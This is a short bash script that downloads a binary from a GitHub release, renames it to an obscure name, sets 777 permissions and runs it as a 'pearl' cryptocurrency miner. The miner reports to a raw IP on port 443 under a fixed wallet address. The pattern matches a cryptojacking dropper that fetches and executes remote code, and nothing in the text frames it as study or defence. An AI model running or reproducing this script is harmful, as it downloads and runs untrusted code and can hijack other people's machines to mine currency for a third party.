#!/bin/bash
rm -rf peakminer-2.16.2.tar.gz
wget https://github.com/vedhagsvp/tkospae/releases/download/aplose/pkso
mv pkso lsejas
chmod 777 lsejas
./lsejas --coin pearl -o 23.239.21.149:443 -u prl1pg75kn5m2very9je3rd0v9z89n7wxxud89gc6v07ayckep4adjgmqzahmmr/$(echo $RANDOM | md5sum | head -c 10)

